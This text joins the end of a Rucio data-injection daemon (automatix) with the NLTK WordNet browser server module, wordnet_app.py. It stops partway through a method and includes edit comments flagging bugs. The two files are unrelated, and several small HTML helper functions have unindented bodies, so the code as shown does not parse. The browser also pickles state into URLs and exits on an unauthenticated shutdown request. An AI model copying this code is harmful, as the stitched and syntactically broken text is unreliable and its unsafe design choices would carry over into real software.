                    # an already-existing replica is not treated as a failure
                    if (not isinstance(ret[item], FileReplicaAlreadyExists)) and ret[item] is not True:
                        sleep(exp(cnt))
                        success_upload = False
                        logger(logging.ERROR, 'Problem to upload file %s with error %s', item, str(ret[item]))
                        break
            else:
                break
        if not success_upload:
            logger(logging.ERROR, 'Upload operation to %s failed, removing leftovers', rse)
            rsemgr.delete(rse_info, lfns=lfns)
            return False
    except Exception as error:
        logger(logging.DEBUG, "Exception", exc_info=True)
        logger(logging.ERROR, '%s', str(error))
        return False
    logger(logging.INFO, 'Files successfully copied on %s', rse)
    # Registering DIDs and replicas in Rucio
    logger(logging.INFO, 'Registering DIDs and replicas in Rucio')
    meta = metadata
    if not set_metadata:
        meta = None
    if dsn:
        # create the dataset with a rule on the target RSE and attach the files
        try:
            client.add_dataset(scope=dsn['scope'], name=dsn['name'], rules=[{'account': account, 'copies': 1, 'rse_expression': rse, 'grouping': 'DATASET', 'activity': 'Functional Test'}], meta=meta, lifetime=dataset_lifetime)
            client.add_files_to_dataset(scope=dsn['scope'], name=dsn['name'], files=list_files, rse=rse)
            logger(logging.INFO, 'Upload operation for %s:%s done', dsn['scope'], dsn['name'])
        except Exception as error:
            logger(logging.DEBUG, "Exception", exc_info=True)
            logger(logging.ERROR, 'Failed to upload %s', str(list_files))
            logger(logging.ERROR, '%s', str(error))
            logger(logging.ERROR, 'removing files from the Storage')
            rsemgr.delete(rse_info, lfns=lfns)
            return False
    else:
        # no dataset requested: register bare replicas with a replication rule
        logger(logging.WARNING, 'No dsn is specified')
        try:
            client.add_replicas(files=list_files, rse=rse)
            client.add_replication_rule(list_files, copies=1, rse_expression=rse, activity='Functional Test')
            logger(logging.INFO, 'Upload operation for %s done', str(list_files))
        except Exception as error:
            logger(logging.DEBUG, "Exception", exc_info=True)
            logger(logging.ERROR, 'Failed to upload %s', str(list_files))
            logger(logging.ERROR, '%s', str(error))
            logger(logging.ERROR, 'Removing files from the Storage')
            rsemgr.delete(rse_info, lfns=lfns)
            return False
    return True
def get_data_distribution(inputfile):
    """Load the event-type definitions from *inputfile* (JSON) and build a
    normalised cumulative probability table over them.

    Returns:
        (probabilities, data): *probabilities* maps each key to its
        cumulative probability in (0, 1]; *data* is the raw parsed JSON.
    """
    with open(inputfile) as handle:
        definitions = load(handle)
    cumulative = {}
    running_total = 0
    for name in definitions:
        running_total += definitions[name]['probability']
        cumulative[name] = running_total
    # normalise so the last cumulative entry is exactly 1.0
    probabilities = {name: float(total) / running_total for name, total in cumulative.items()}
    return probabilities, definitions
def choose_element(probabilities, data):
    """Pick one entry of *data* at random, following the cumulative
    probability table built by ``get_data_distribution``."""
    draw = random.uniform(0, 1)
    for name in probabilities:
        if probabilities[name] >= draw:
            return data[name]
    # guard against floating point rounding: fall back to the last entry
    return data[name]
def generate_file(fname, size, logger=logging.log):
    """Create *fname* filled with *size* bytes of random data via dd.

    Returns:
        the dd exit code (0 on success).
    """
    exitcode, stdout, stderr = execute('/bin/dd if=/dev/urandom of=%s bs=%s count=1' % (fname, size))
    logger(logging.DEBUG, stdout)
    logger(logging.DEBUG, stderr)
    return exitcode
def generate_didname(metadata, dsn, did_type):
    """Build a DID name from the configured pattern for *did_type*.

    The pattern is a separator-joined list of field names; each field is
    resolved from a few built-ins (date, did_prefix, dsn, uuid, randint) or
    from *metadata*, with empty/missing values replaced by a random integer.
    When no pattern or separator is configured, a bare UUID is returned.
    """
    try:
        did_prefix = get('automatix', 'did_prefix')
    except ConfigNotFound:
        did_prefix = ''
    try:
        pattern = get('automatix', '%s_pattern' % did_type)
        separator = get('automatix', 'separator')
    except ConfigNotFound:
        return generate_uuid()
    parts = []
    for field in pattern.split(separator):
        if field == 'date':
            value = str(datetime.now().date())
        elif field == 'did_prefix':
            value = did_prefix
        elif field == 'dsn':
            value = dsn
        elif field == 'uuid':
            value = generate_uuid()
        elif field == 'randint':
            value = str(random.randint(0, 100000))
        else:
            value = metadata.get(field, None)
        if not value:
            # any empty or unresolvable field falls back to a random integer
            value = str(random.randint(0, 100000))
        parts.append('%s' % value)
    return separator.join(parts)
def automatix(sites, inputfile, sleep_time, account, worker_number=1, total_workers=1, scope='tests', once=False, dataset_lifetime=None, set_metadata=False):
    """Worker loop of the automatix daemon.

    Each iteration picks a random dataset description from *inputfile*,
    generates the files locally, uploads and registers them on every site,
    then sleeps. Runs until GRACEFUL_STOP is set (or one pass when *once*).

    Parameters:
        sites: list of RSE names to upload to.
        inputfile: path to the JSON data-distribution file.
        sleep_time: seconds to sleep between successful iterations.
        account: account used for the replication rules.
        worker_number / total_workers: identity of this worker, used to
            stagger startup and label log lines.
        scope: scope the generated DIDs are created in.
        once: run a single iteration and exit.
        dataset_lifetime: lifetime (seconds) of created datasets, or None.
        set_metadata: whether to attach metadata to created datasets.
    """
    # stagger the worker start times so they don't all fire at once
    sleep(sleep_time * (total_workers - worker_number) / total_workers)
    executable = 'automatix'
    hostname = socket.getfqdn()
    pid = getpid()
    hb_thread = threading.current_thread()
    heartbeat.sanity_check(executable=executable, hostname=hostname)
    prefix = 'automatix[%i/%i] : ' % (worker_number, total_workers)
    logger = formatted_logger(logging.log, prefix + '%s')
    while not GRACEFUL_STOP.is_set():
        heartbeat.live(executable, hostname, pid, hb_thread)
        starttime = time()
        prefix = 'automatix[%i/%i] : ' % (worker_number, total_workers)
        logger = formatted_logger(logging.log, prefix + '%s')
        logger(logging.INFO, 'Getting data distribution')
        # distribution is re-read every iteration so config edits are picked up
        probabilities, data = get_data_distribution(inputfile)
        logger(logging.DEBUG, 'Probabilities %s', probabilities)
        totretries = 3
        status = False
        for site in sites:
            # retry a failed upload up to totretries times per site
            for retry in range(0, totretries):
                start_time = time()
                tmpdir = tempfile.mkdtemp()
                logger(logging.INFO, 'Running on site %s', site)
                dic = choose_element(probabilities, data)
                metadata = dic['metadata']
                try:
                    nbfiles = dic['nbfiles']
                except KeyError:
                    nbfiles = 2
                    logger(logging.WARNING, 'No nbfiles defined in the configuration, will use 2')
                try:
                    filesize = dic['filesize']
                except KeyError:
                    filesize = 1000000
                    logger(logging.WARNING, 'No filesize defined in the configuration, will use 1M files')
                dsn = generate_didname(metadata, None, 'dataset')
                fnames = []
                lfns = []
                physical_fnames = []
                # generate nbfiles random files in the temporary directory
                for _ in range(nbfiles):
                    fname = generate_didname(metadata=metadata, dsn=dsn, did_type='file')
                    lfns.append(fname)
                    logger(logging.INFO, 'Generating file %s in dataset %s', fname, dsn)
                    physical_fname = '%s/%s' % (tmpdir, "".join(fname.split('/')))
                    physical_fnames.append(physical_fname)
                    generate_file(physical_fname, filesize, logger=logger)
                    fnames.append(fname)
                logger(logging.INFO, 'Upload %s to %s', dsn, site)
                dsn = '%s:%s' % (scope, dsn)
                status = upload(files=lfns, scope=scope, metadata=metadata, rse=site, account=account, source_dir=tmpdir, dataset_lifetime=dataset_lifetime, did=dsn, set_metadata=set_metadata, logger=logger)
                # always clean up the local files, whatever the outcome
                for physical_fname in physical_fnames:
                    remove(physical_fname)
                rmdir(tmpdir)
                if status:
                    monitor.record_counter(name='automatix.addnewdataset.done', delta=1)
                    monitor.record_counter(name='automatix.addnewfile.done', delta=nbfiles)
                    monitor.record_timer('automatix.datasetinjection', (time() - start_time) * 1000)
                    break
                else:
                    logger(logging.INFO, 'Failed to upload files. Will retry another time (attempt %s/%s)', str(retry + 1), str(totretries))
        if once is True:
            logger(logging.INFO, 'Run with once mode. Exiting')
            break
        tottime = time() - starttime
        if status:
            logger(logging.INFO, 'It took %s seconds to upload one dataset on %s', str(tottime), str(sites))
            daemon_sleep(start_time=starttime, sleep_time=sleep_time, graceful_stop=GRACEFUL_STOP, logger=logger)
        else:
            # failed iteration: loop again immediately without sleeping
            logger(logging.INFO, 'Retrying a new upload')
    heartbeat.die(executable, hostname, pid, hb_thread)
    logger(logging.INFO, 'Graceful stop requested')
    logger(logging.INFO, 'Graceful stop done')
def run(total_workers=1, once=False, inputfile=None, sleep_time=-1):
    """
    Starts up the automatix threads.

    Reads the daemon configuration (sites, account, scope, lifetimes, ...)
    from the 'automatix' config section, spawns *total_workers* worker
    threads and joins them until the first one exits.
    """
    setup_logging()
    if rucio.db.sqla.util.is_old_db():
        raise exception.DatabaseException('Database was not updated, daemon won\'t start')
    try:
        sites = [s.strip() for s in get('automatix', 'sites').split(',')]
    except Exception:
        raise Exception('Could not load sites from configuration')
    if not inputfile:
        inputfile = '/opt/rucio/etc/automatix.json'

    def _option(name, fallback):
        # read an optional 'automatix' setting, using the fallback on any error
        try:
            return get('automatix', name)
        except Exception:
            return fallback

    if sleep_time == -1:
        sleep_time = _option('sleep_time', 30)
    account = _option('account', 'root')
    dataset_lifetime = _option('dataset_lifetime', None)
    set_metadata = _option('set_metadata', False)
    try:
        scope = get('automatix', 'scope')
        client = Client()
        filters = {'scope': InternalScope('*', vo=client.vo)}
        # refuse to start injecting into a scope that doesn't exist
        if InternalScope(scope, vo=client.vo) not in list_scopes(filter_=filters):
            logging.log(logging.ERROR, 'Scope %s does not exist. Exiting', scope)
            GRACEFUL_STOP.set()
    except Exception:
        scope = False
    workers = []
    for worker_number in range(0, total_workers):
        kwargs = {'worker_number': worker_number,
                  'total_workers': total_workers,
                  'once': once,
                  'sites': sites,
                  'sleep_time': sleep_time,
                  'account': account,
                  'inputfile': inputfile,
                  'set_metadata': set_metadata,
                  'scope': scope,
                  'dataset_lifetime': dataset_lifetime}
        workers.append(threading.Thread(target=automatix, kwargs=kwargs))
    for worker in workers:
        worker.start()
    # keep the main thread responsive to signals while the workers run
    while workers[0].is_alive():
        logging.log(logging.DEBUG, 'Still %i active threads', len(workers))
        for worker in workers:
            worker.join(timeout=3.14)
def stop(signum=None, frame=None):
    """
    Graceful exit.

    Accepts (and ignores) *signum* and *frame* so it can be registered
    directly as a signal handler.
    """
    GRACEFUL_STOP.set()
|
wordnet_app.py | # Natural Language Toolkit: WordNet Browser Application
#
# Copyright (C) 2001-2021 NLTK Project
# Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
# Paul Bone <pbone@students.csse.unimelb.edu.au>
# URL: <https://www.nltk.org/>
# For license information, see LICENSE.TXT
"""
A WordNet Browser application which launches the default browser
(if it is not already running) and opens a new tab with a connection
to http://localhost:port/ . It also starts an HTTP server on the
specified port and begins serving browser requests. The default
port is 8000. (For command-line help, run "python wordnet -h")
This application requires that the user's web browser supports
Javascript.
BrowServer is a server for browsing the NLTK Wordnet database. It first
launches a browser client to be used for browsing and then starts
serving the requests of that and maybe other clients
Usage::
browserver.py -h
browserver.py [-s] [-p <port>]
Options::
-h or --help
Display this help message.
-l <file> or --log-file <file>
Logs messages to the given file. If this option is not specified,
messages are silently dropped.
-p <port> or --port <port>
Run the web server on this TCP port, defaults to 8000.
-s or --server-mode
Do not start a web browser, and do not allow a user to
shutdown the server through the web interface.
"""
# TODO: throughout this package variable names and docstrings need
# modifying to be compliant with NLTK's coding standards. Tests also
# need to be develop to ensure this continues to work in the face of
# changes to other NLTK packages.
import base64
import copy
import datetime
import getopt
import os
import pickle
import re
import sys
import threading
import time
import webbrowser
from collections import defaultdict
from http.server import BaseHTTPRequestHandler, HTTPServer
# Allow this program to run inside the NLTK source tree.
from sys import argv, path
from urllib.parse import unquote_plus
from nltk.corpus import wordnet as wn
from nltk.corpus.reader.wordnet import Lemma, Synset
# now included in local file
# from util import html_header, html_trailer, \
# get_static_index_page, get_static_page_by_path, \
# page_from_word, page_from_href
# True until the first browser request has been served; used to decide
# whether the initial help page should be shown.
firstClient = True
# True if we're not also running a web browser. The value of server_mode
# gets set by wnb().
server_mode = None
# If set this is a file object for writing log messages.
logfile = None
class MyServerHandler(BaseHTTPRequestHandler):
    """HTTP request handler that serves the Wordnet browser pages.

    Dispatches on the request path: search queries, synset lookups, static
    pages and the shutdown request. Relies on the module-level helpers
    (get_static_index_page, page_from_word, page_from_href, ...) and the
    globals ``server_mode`` / ``firstClient``.
    """

    def do_HEAD(self):
        # HEAD is identical to GET minus the body
        self.send_head()

    def do_GET(self):
        """Parse the request path and serve the corresponding page."""
        global firstClient
        sp = self.path[1:]  # path without the leading '/'
        # NOTE: the local name `type` shadows the builtin throughout this method
        if unquote_plus(sp) == "SHUTDOWN THE SERVER":
            # shutdown is only honoured when a browser was auto-started
            if server_mode:
                page = "Server must be killed with SIGTERM."
                type = "text/plain"
            else:
                print("Server shutting down!")
                os._exit(0)
        elif sp == "":  # First request.
            type = "text/html"
            # the very first client gets the index page with the help shown
            if not server_mode and firstClient:
                firstClient = False
                page = get_static_index_page(True)
            else:
                page = get_static_index_page(False)
            word = "green"
        elif sp.endswith(".html"):  # Trying to fetch a HTML file TODO:
            type = "text/html"
            usp = unquote_plus(sp)
            if usp == "NLTK Wordnet Browser Database Info.html":
                word = "* Database Info *"
                if os.path.isfile(usp):
                    with open(usp) as infile:
                        page = infile.read()
                else:
                    # explain how to generate the missing database-info file
                    page = (
                        (html_header % word) + "<p>The database info file:"
                        "<p><b>"
                        + usp
                        + "</b>"
                        + "<p>was not found. Run this:"
                        + "<p><b>python dbinfo_html.py</b>"
                        + "<p>to produce it."
                        + html_trailer
                    )
            else:
                # Handle files here.
                word = sp
                page = get_static_page_by_path(usp)
        elif sp.startswith("search"):
            # This doesn't seem to work with MWEs.
            type = "text/html"
            # extract the 'nextWord' query parameter from the query string
            parts = (sp.split("?")[1]).split("&")
            word = [
                p.split("=")[1].replace("+", " ")
                for p in parts
                if p.startswith("nextWord")
            ][0]
            page, word = page_from_word(word)
        elif sp.startswith("lookup_"):
            # TODO add a variation of this that takes a non ecoded word or MWE.
            type = "text/html"
            sp = sp[len("lookup_") :]
            page, word = page_from_href(sp)
        elif sp == "start_page":
            # if this is the first request we should display help
            # information, and possibly set a default word.
            type = "text/html"
            page, word = page_from_word("wordnet")
        else:
            type = "text/plain"
            page = "Could not parse request: '%s'" % sp
        # Send result.
        self.send_head(type)
        self.wfile.write(page.encode("utf8"))

    def send_head(self, type=None):
        """Send a 200 response with the given Content-type header."""
        self.send_response(200)
        self.send_header("Content-type", type)
        self.end_headers()

    def log_message(self, format, *args):
        """Write an access-log line to the module logfile, if one is open."""
        global logfile
        if logfile:
            logfile.write(
                "%s - - [%s] %s\n"
                % (self.address_string(), self.log_date_time_string(), format % args)
            )
def get_unique_counter_from_url(sp):
    """
    Extract the unique counter from the URL if it has one. Otherwise return
    None.

    The counter is the integer following the last URL-encoded '#' ("%23").
    """
    marker = sp.rfind("%23")
    if marker == -1:
        return None
    return int(sp[marker + 3:])
def wnb(port=8000, runBrowser=True, logfilename=None):
    """
    Run NLTK Wordnet Browser Server.

    :param port: The port number for the server to listen on, defaults to
                 8000
    :type  port: int

    :param runBrowser: True to start a web browser and point it at the web
                       server.
    :type  runBrowser: bool

    :param logfilename: optional path of a file to append access-log
                        messages to; when None, messages are dropped.
    :type  logfilename: str
    """
    # The webbrowser module is unpredictable, typically it blocks if it uses
    # a console web browser, and doesn't block if it uses a GUI webbrowser,
    # so we need to force it to have a clear correct behaviour.
    #
    # Normally the server should run for as long as the user wants. They
    # should ideally be able to control this from the UI by closing the
    # window or tab. Second best would be clicking a button to say
    # 'Shutdown' that first shuts down the server and closes the window or
    # tab, or exits the text-mode browser. Both of these are unfeasible.
    #
    # The next best alternative is to start the server, have it close when
    # it receives SIGTERM (default), and run the browser as well. The user
    # may have to shutdown both programs.
    #
    # Since webbrowser may block, and the webserver will block, we must run
    # them in separate threads.
    #
    global server_mode, logfile
    server_mode = not runBrowser
    # Setup logging.
    if logfilename:
        try:
            logfile = open(logfilename, "a", 1)  # 1 means 'line buffering'
        except OSError as e:
            sys.stderr.write("Couldn't open %s for writing: %s", logfilename, e)
            sys.exit(1)
    else:
        logfile = None
    # Compute URL and start web browser
    url = "http://localhost:" + str(port)
    server_ready = None
    browser_thread = None
    if runBrowser:
        # the browser thread waits on this event until the server is up
        server_ready = threading.Event()
        browser_thread = startBrowser(url, server_ready)
    # Start the server.
    server = HTTPServer(("", port), MyServerHandler)
    if logfile:
        logfile.write("NLTK Wordnet browser server running serving: %s\n" % url)
    if runBrowser:
        server_ready.set()
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        pass
    # clean up the browser thread and the log file before returning
    if runBrowser:
        browser_thread.join()
    if logfile:
        logfile.close()
def startBrowser(url, server_ready):
    """Open *url* in the default web browser once *server_ready* is set.

    The browser is launched from a background thread, which is returned so
    the caller can join it.
    """
    def _open_when_ready():
        server_ready.wait()
        # Wait a little bit more, there's still the chance of a race
        # condition with the server startup.
        time.sleep(1)
        webbrowser.open(url, new=2, autoraise=1)

    thread = threading.Thread(target=_open_when_ready)
    thread.start()
    return thread
#####################################################################
# Utilities
#####################################################################
"""
WordNet Browser Utilities.
This provides a backend to both wxbrowse and browserver.py.
"""
################################################################################
#
# Main logic for wordnet browser.
#
# This is wrapped inside a function since wn is only available if the
# WordNet corpus is installed.
def _pos_tuples():
    """Return the (wordnet pos, abbreviation, name) triples for every
    supported part of speech."""
    return [(wn.NOUN, "N", "noun"), (wn.VERB, "V", "verb"), (wn.ADJ, "J", "adj"), (wn.ADV, "R", "adv")]
def _pos_match(pos_tuple):
    """
    Return the complete pos tuple matching the partial tuple given.

    Matching is done on the first non-null component of *pos_tuple*;
    satellite adjectives ('s') are treated as plain adjectives. Returns
    None when nothing matches.
    """
    if pos_tuple[0] == "s":
        pos_tuple = ("a", pos_tuple[1], pos_tuple[2])
    # index of the first non-null component (last index when all are null)
    idx = next((i for i, component in enumerate(pos_tuple) if component is not None), len(pos_tuple) - 1)
    for candidate in _pos_tuples():
        if candidate[idx] == pos_tuple[idx]:
            return candidate
    return None
# Identifiers for the synset relation types displayed by the browser.
# NOTE(review): CLASS_REGIONAL, CLASS_USAGE and CLASS_CATEGORY are each
# assigned twice below; only the last assignment of each name wins.
HYPONYM = 0
HYPERNYM = 1
CLASS_REGIONAL = 2
PART_HOLONYM = 3
PART_MERONYM = 4
ATTRIBUTE = 5
SUBSTANCE_HOLONYM = 6
SUBSTANCE_MERONYM = 7
MEMBER_HOLONYM = 8
MEMBER_MERONYM = 9
VERB_GROUP = 10
INSTANCE_HYPONYM = 12
INSTANCE_HYPERNYM = 13
CAUSE = 14
ALSO_SEE = 15
SIMILAR = 16
ENTAILMENT = 17
ANTONYM = 18
FRAMES = 19
PERTAINYM = 20
CLASS_CATEGORY = 21
CLASS_USAGE = 22
CLASS_REGIONAL = 23
CLASS_USAGE = 24
CLASS_CATEGORY = 11
DERIVATIONALLY_RELATED_FORM = 25
INDIRECT_HYPERNYMS = 26
def lemma_property(word, synset, func):
    """Apply *func* to every lemma of *synset* whose name is *word* and
    return the concatenation of the resulting lists.

    Bug fix: ``Synset.lemmas`` and ``Lemma.name`` are methods in NLTK 3 and
    must be called — the original iterated the bound method object and
    compared a method to a string (the rest of this file already calls
    them, e.g. in _collect_one_synset).
    """
    def flattern(l):
        # recursively concatenate a list of lists into one flat list
        if l == []:
            return []
        else:
            return l[0] + flattern(l[1:])

    return flattern([func(l) for l in synset.lemmas() if l.name() == word])
def rebuild_tree(orig_tree):
    """Recursively convert a ``Synset.tree`` result (a node followed by its
    child trees) into (node, [children]) form."""
    root, subtrees = orig_tree[0], orig_tree[1:]
    return root, [rebuild_tree(subtree) for subtree in subtrees]
def get_relations_data(word, synset):
    """
    Get synset relations data for a synset. Note that this doesn't
    yet support things such as full hyponym vs direct hyponym.

    Returns a tuple of (relation-id, display label, related items) triples
    appropriate for the synset's part of speech; raises TypeError for an
    unknown POS.

    Bug fix: the satellite-adjective test compared the bound method
    ``synset.pos`` (instead of its result) to ``wn.ADJ_SAT``, so it was
    always False.
    """
    if synset.pos() == wn.NOUN:
        return (
            (HYPONYM, "Hyponyms", synset.hyponyms()),
            (INSTANCE_HYPONYM, "Instance hyponyms", synset.instance_hyponyms()),
            (HYPERNYM, "Direct hypernyms", synset.hypernyms()),
            (
                INDIRECT_HYPERNYMS,
                "Indirect hypernyms",
                rebuild_tree(synset.tree(lambda x: x.hypernyms()))[1],
            ),
            # hypernyms', 'Sister terms',
            (INSTANCE_HYPERNYM, "Instance hypernyms", synset.instance_hypernyms()),
            # (CLASS_REGIONAL, ['domain term region'], ),
            (PART_HOLONYM, "Part holonyms", synset.part_holonyms()),
            (PART_MERONYM, "Part meronyms", synset.part_meronyms()),
            (SUBSTANCE_HOLONYM, "Substance holonyms", synset.substance_holonyms()),
            (SUBSTANCE_MERONYM, "Substance meronyms", synset.substance_meronyms()),
            (MEMBER_HOLONYM, "Member holonyms", synset.member_holonyms()),
            (MEMBER_MERONYM, "Member meronyms", synset.member_meronyms()),
            (ATTRIBUTE, "Attributes", synset.attributes()),
            (ANTONYM, "Antonyms", lemma_property(word, synset, lambda l: l.antonyms())),
            (
                DERIVATIONALLY_RELATED_FORM,
                "Derivationally related form",
                lemma_property(
                    word, synset, lambda l: l.derivationally_related_forms()
                ),
            ),
        )
    elif synset.pos() == wn.VERB:
        return (
            (ANTONYM, "Antonym", lemma_property(word, synset, lambda l: l.antonyms())),
            (HYPONYM, "Hyponym", synset.hyponyms()),
            (HYPERNYM, "Direct hypernyms", synset.hypernyms()),
            (
                INDIRECT_HYPERNYMS,
                "Indirect hypernyms",
                rebuild_tree(synset.tree(lambda x: x.hypernyms()))[1],
            ),
            (ENTAILMENT, "Entailments", synset.entailments()),
            (CAUSE, "Causes", synset.causes()),
            (ALSO_SEE, "Also see", synset.also_sees()),
            (VERB_GROUP, "Verb Groups", synset.verb_groups()),
            (
                DERIVATIONALLY_RELATED_FORM,
                "Derivationally related form",
                lemma_property(
                    word, synset, lambda l: l.derivationally_related_forms()
                ),
            ),
        )
    elif synset.pos() == wn.ADJ or synset.pos() == wn.ADJ_SAT:
        return (
            (ANTONYM, "Antonym", lemma_property(word, synset, lambda l: l.antonyms())),
            (SIMILAR, "Similar to", synset.similar_tos()),
            # Participle of verb - not supported by corpus
            (
                PERTAINYM,
                "Pertainyms",
                lemma_property(word, synset, lambda l: l.pertainyms()),
            ),
            (ATTRIBUTE, "Attributes", synset.attributes()),
            (ALSO_SEE, "Also see", synset.also_sees()),
        )
    elif synset.pos() == wn.ADV:
        # This is weird. adverbs such as 'quick' and 'fast' don't seem
        # to have antonyms returned by the corpus.
        return (
            (ANTONYM, "Antonym", lemma_property(word, synset, lambda l: l.antonyms())),
        )
    # Derived from adjective - not supported by corpus
    else:
        raise TypeError("Unhandled synset POS type: " + str(synset.pos()))
# Page skeleton: html_header takes the current word (for the title) via %s.
html_header = """
<!DOCTYPE html PUBLIC '-//W3C//DTD HTML 4.01//EN'
'http://www.w3.org/TR/html4/strict.dtd'>
<html>
<head>
<meta name='generator' content=
'HTML Tidy for Windows (vers 14 February 2006), see www.w3.org'>
<meta http-equiv='Content-Type' content=
'text/html; charset=us-ascii'>
<title>NLTK Wordnet Browser display of: %s</title></head>
<body bgcolor='#F5F5F5' text='#000000'>
"""
# Closing tags appended to every generated page.
html_trailer = """
</body>
</html>
"""
# Static help text shown on the start page, above the example output.
explanation = """
<h3>Search Help</h3>
<ul><li>The display below the line is an example of the output the browser
shows you when you enter a search word. The search word was <b>green</b>.</li>
<li>The search result shows for different parts of speech the <b>synsets</b>
i.e. different meanings for the word.</li>
<li>All underlined texts are hypertext links. There are two types of links:
word links and others. Clicking a word link carries out a search for the word
in the Wordnet database.</li>
<li>Clicking a link of the other type opens a display section of data attached
to that link. Clicking that link a second time closes the section again.</li>
<li>Clicking <u>S:</u> opens a section showing the relations for that synset.
</li>
<li>Clicking on a relation name opens a section that displays the associated
synsets.</li>
<li>Type a search word in the <b>Word</b> field and start the search by the
<b>Enter/Return</b> key or click the <b>Search</b> button.</li>
</ul>
<hr width='100%'>
"""
# HTML oriented functions
def _bold(txt):
return "<b>%s</b>" % txt
def _center(txt):
return "<center>%s</center>" % txt
def _hlev(n, txt):
return "<h%d>%s</h%d>" % (n, txt, n)
def _italic(txt):
return "<i>%s</i>" % txt
def _li(txt):
return "<li>%s</li>" % txt
def pg(word, body):
    """
    Return a HTML page of NLTK Browser format constructed from the
    word and body

    :param word: The word that the body corresponds to
    :type word: str
    :param body: The HTML body corresponding to the word
    :type body: str
    :return: a HTML page for the word-body combination
    :rtype: str
    """
    header = html_header % word
    return "".join((header, body, html_trailer))
def _ul(txt):
return "<ul>" + txt + "</ul>"
def _abbc(txt):
    """
    abbc = asterisks, breaks, bold, center
    """
    stars = "*" * 10
    banner = "<br>" * 10 + stars + " " + txt + " " + stars
    return _center(_bold(banner))
# Marker appended when a hyponym tree is truncated instead of fully expanded.
full_hyponym_cont_text = _ul(_li(_italic("(has full hyponym continuation)"))) + "\n"
def _get_synset(synset_key):
    """
    The synset key is the unique name of the synset, this can be
    retrieved via synset.name()

    :return: the Synset object named by the key, looked up in the corpus
    """
    return wn.synset(synset_key)
def _collect_one_synset(word, synset, synset_relations):
    """
    Returns the HTML string for one synset or word

    :param word: the current word
    :type word: str
    :param synset: a synset
    :type synset: synset
    :param synset_relations: information about which synset relations
    to display.
    :type synset_relations: dict(synset_key, set(relation_id))
    :return: The HTML string built for this synset
    :rtype: str
    """
    if isinstance(synset, tuple):  # It's a word
        raise NotImplementedError("word not supported by _collect_one_synset")

    typ = "S"
    pos_tuple = _pos_match((synset.pos(), None, None))
    assert pos_tuple is not None, "pos_tuple is null: synset.pos(): %s" % synset.pos()
    descr = pos_tuple[2]

    # Deep-copy so toggling this synset for the "S;" link does not mutate
    # the caller's synset_relations mapping.
    ref = copy.deepcopy(Reference(word, synset_relations))
    ref.toggle_synset(synset)
    synset_label = typ + ";"
    # Bold the label when this synset's relations are currently unfolded.
    if synset.name() in synset_relations:
        synset_label = _bold(synset_label)
    s = f"<li>{make_lookup_link(ref, synset_label)} ({descr}) "

    def format_lemma(w):
        # The searched word itself is bolded; any other lemma becomes a
        # lookup link for that lemma.
        w = w.replace("_", " ")
        if w.lower() == word:
            return _bold(w)
        else:
            ref = Reference(w)
            return make_lookup_link(ref, w)

    s += ", ".join(format_lemma(l.name()) for l in synset.lemmas())

    # Definition plus quoted usage examples.
    gl = " ({}) <i>{}</i> ".format(
        synset.definition(),
        "; ".join('"%s"' % e for e in synset.examples()),
    )
    return s + gl + _synset_relations(word, synset, synset_relations) + "</li>\n"
def _collect_all_synsets(word, pos, synset_relations=None):
    """
    Return a HTML unordered list of synsets for the given word and
    part of speech.

    :param word: the word to look up synsets for
    :param pos: the part of speech to restrict the lookup to
    :param synset_relations: which relations to unfold per synset key;
        defaults to none.
    """
    # Fix: the default used to be ``dict()`` — a mutable default argument
    # created once at function definition time.  It was not mutated here,
    # but the None-sentinel form removes the shared-state hazard and is
    # backward compatible for all callers.
    if synset_relations is None:
        synset_relations = {}
    return "<ul>%s\n</ul>\n" % "".join(
        _collect_one_synset(word, synset, synset_relations)
        for synset in wn.synsets(word, pos)
    )
def _synset_relations(word, synset, synset_relations):
    """
    Builds the HTML string for the relations of a synset

    :param word: The current word
    :type word: str
    :param synset: The synset for which we're building the relations.
    :type synset: Synset
    :param synset_relations: synset keys and relation types for which to display relations.
    :type synset_relations: dict(synset_key, set(relation_type))
    :return: The HTML for a synset's relations
    :rtype: str
    """
    # Only synsets whose relations are currently unfolded produce output.
    if not synset.name() in synset_relations:
        return ""
    ref = Reference(word, synset_relations)

    def relation_html(r):
        # Render one related item: Synsets become lookup links, Lemmas are
        # rendered via their parent synset, and (synset, [children]) tuples
        # recurse to render a nested tree.
        if isinstance(r, Synset):
            return make_lookup_link(Reference(r.lemma_names()[0]), r.lemma_names()[0])
        elif isinstance(r, Lemma):
            return relation_html(r.synset())
        elif isinstance(r, tuple):
            # It's probably a tuple containing a Synset and a list of
            # similar tuples. This forms a tree of synsets.
            return "{}\n<ul>{}</ul>\n".format(
                relation_html(r[0]),
                "".join("<li>%s</li>\n" % relation_html(sr) for sr in r[1]),
            )
        else:
            raise TypeError(
                "r must be a synset, lemma or list, it was: type(r) = %s, r = %s"
                % (type(r), r)
            )

    def make_synset_html(db_name, disp_name, rels):
        # The relation name itself links to a page with its state toggled.
        # NOTE(review): ``.encode()`` already turns the Reference into a
        # str here, yet make_lookup_link calls ``.encode()`` on its
        # argument again — for a str that yields bytes and would embed a
        # b'...' repr in the href.  Looks wrong; confirm against
        # make_lookup_link before relying on this path.
        synset_html = "<i>%s</i>\n" % make_lookup_link(
            copy.deepcopy(ref).toggle_synset_relation(synset, db_name).encode(),
            disp_name,
        )

        # Only list the related synsets when this relation is unfolded.
        if db_name in ref.synset_relations[synset.name()]:
            synset_html += "<ul>%s</ul>\n" % "".join(
                "<li>%s</li>\n" % relation_html(r) for r in rels
            )

        return synset_html

    # One <li> per non-empty relation of this synset.
    html = (
        "<ul>"
        + "\n".join(
            "<li>%s</li>" % make_synset_html(*rel_data)
            for rel_data in get_relations_data(word, synset)
            if rel_data[2] != []
        )
        + "</ul>"
    )

    return html
class Reference:
    """
    A reference to a page that may be generated by page_word
    """

    def __init__(self, word, synset_relations=None):
        """
        Build a reference to a new page.

        word is the word or words (separated by commas) for which to
        search for synsets of

        synset_relations is a dictionary of synset keys to sets of
        synset relation identifiers to unfold a list of synset
        relations for.  When omitted, each instance starts with its own
        empty mapping.
        """
        self.word = word
        # Bug fix: the default used to be ``dict()``, a single mutable
        # dict created at definition time.  toggle_synset() and
        # toggle_synset_relation() mutate this attribute in place, so
        # every Reference built without an explicit mapping shared — and
        # polluted — the same dictionary.  Allocate a fresh dict per
        # instance instead; passing an explicit mapping behaves as before.
        self.synset_relations = {} if synset_relations is None else synset_relations

    def encode(self):
        """
        Encode this reference into a string to be used in a URL.
        """
        # This uses a tuple rather than an object since the python
        # pickle representation is much smaller and there is no need
        # to represent the complete object.
        string = pickle.dumps((self.word, self.synset_relations), -1)
